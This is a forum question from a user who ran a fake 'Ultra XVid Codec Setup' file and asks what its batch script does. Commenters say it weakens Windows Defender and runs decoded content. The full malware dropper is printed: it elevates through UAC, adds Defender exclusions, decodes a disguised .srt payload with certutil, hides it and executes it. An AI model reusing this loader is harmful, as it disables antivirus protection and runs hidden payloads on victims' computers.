What does this script do that came disguised as a video codec executable?
I unsuspectingly executed this script. It came with the file name 'Ultra XVid Codec Setup'. Another file was a .srt file, but it contains a certificate key and nothing else.
Want to find out what the script tries to do? And if it's malicious, how to reverse the effects. Thanks!
    @echo off
    CLS
    ECHO.
    ECHO ======================================
    ECHO ===Running Admin shell please wait====

    :init
    setlocal DisableDelayedExpansion
    set cmdInvoke=1
    set winSysFolder=System32
    set "batchPath=%~0"
    for %%k in (%0) do set batchName=%%~nk
    set "vbsGetPrivileges=%temp%\OEgetPriv_%batchName%.vbs"
    setlocal EnableDelayedExpansion

    :checkPrivileges
     NET FILE 1>NUL 2>NUL
     if '%errorlevel%' == '0' ( goto gotPrivileges ) else ( goto getPrivileges )

    :getPrivileges
      if '%1'=='ELEV' (echo ELEV & shift /1 & goto gotPrivileges)
      ECHO.
      ECHO **************************************
      ECHO Invoking UAC for Privilege Escalation
      ECHO **************************************

      ECHO Set UAC = CreateObject^("Shell.Application"^) > "%vbsGetPrivileges%"
      ECHO args = "ELEV " >> "%vbsGetPrivileges%"
      ECHO For Each strArg in WScript.Arguments >> "%vbsGetPrivileges%"
      ECHO args = args ^& strArg ^& " "  >> "%vbsGetPrivileges%"
      ECHO Next >> "%vbsGetPrivileges%"

      if '%cmdInvoke%'=='1' goto InvokeCmd 

      ECHO UAC.ShellExecute "!batchPath!", args, "", "runas", 1 >> "%vbsGetPrivileges%"
      goto ExecElevation

    :InvokeCmd
      ECHO args = "/c """ + "!batchPath!" + """ " + args >> "%vbsGetPrivileges%"
      ECHO UAC.ShellExecute "%SystemRoot%\%winSysFolder%\cmd.exe", args, "", "runas", 1 >>     "%vbsGetPrivileges%"

    :ExecElevation
     "%SystemRoot%\%winSysFolder%\WScript.exe" "%vbsGetPrivileges%" %*
     exit /B

    :gotPrivileges
     setlocal & cd /d %~dp0
     if '%1'=='ELEV' (del "%vbsGetPrivileges%" 1>nul 2>nul  &  shift /1)

     set packageDataRaw=75095_VTS.srt
     set packageData=75095_VTS.dat
     set batchDir=%cd%

     set ruleProcess="%batchDir%\%packageData%"
     set rulePath="%batchDir%"

     powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -    ExclusionExtension "srt"
     powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -    ExclusionExtension "dat"
     powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension "exe"

     powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess "%ruleProcess%"
     powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "%rulePath%"
 
     ECHO.
     ECHO Download update..
     ping 127.0.0.1 -n 8 > nul

     certutil -decode -f "%packageDataRaw%" "%packageData%"
     certutil -decode -f "%packageData%" "%packageData%"

     attrib +H "%packageData%"

     start %packageData%

     ECHO %batchName% Arguments: P1=%1 P2=%2 P3=%3 P4=%4 P5=%5 P6=%6 P7=%7 P8=%8 P9=%9
     cmd /k
     exit`

I unsuspectingly executed this script. It came with the file name 'Ultra XVid Codec Setup'. Another file was a .srt file, but it contains a certificate key and nothing else.
Want to find out what the script tries to do? And if it's malicious, how to reverse the effects. Thanks!

it's likely your question hasn't been vote-closed because you used the [shell] tag instead of [cmd] as there are fewer followers for shell. This Q isn't about programming problems as defined in S.O.'s [help]. Your question may be on-topic for [su] or [security.se] but you'll need to read those sites' help about on-topic questions and formulate/edit your question to meet their requirements. Interesting problem, but I have not experience with this domain. Good luck.

thanks @shellter. I admit it was a lazy effort to post it in the first available place. I later posted the code into copilot and got the sense that it is sort of deactivating some of the defenses. Maybe if I subsequently downloaded another related file, that would have started to mess around. In this case, I reverted those changes, so hopefully all good.

In addition to what shellter said: A plain shell tag without further qualification relates to POSIX shells or shell which claim POSIX compatibility. Since your code is not POSIX shell, it does not relate to your tag at all. The script seems to modify your Windows defender settings (Add-MpPreference), then it decodes some stuff and runs it. Looks fishy to me. Better you disconnect your computer from your LAN, until you have found out what's going on.
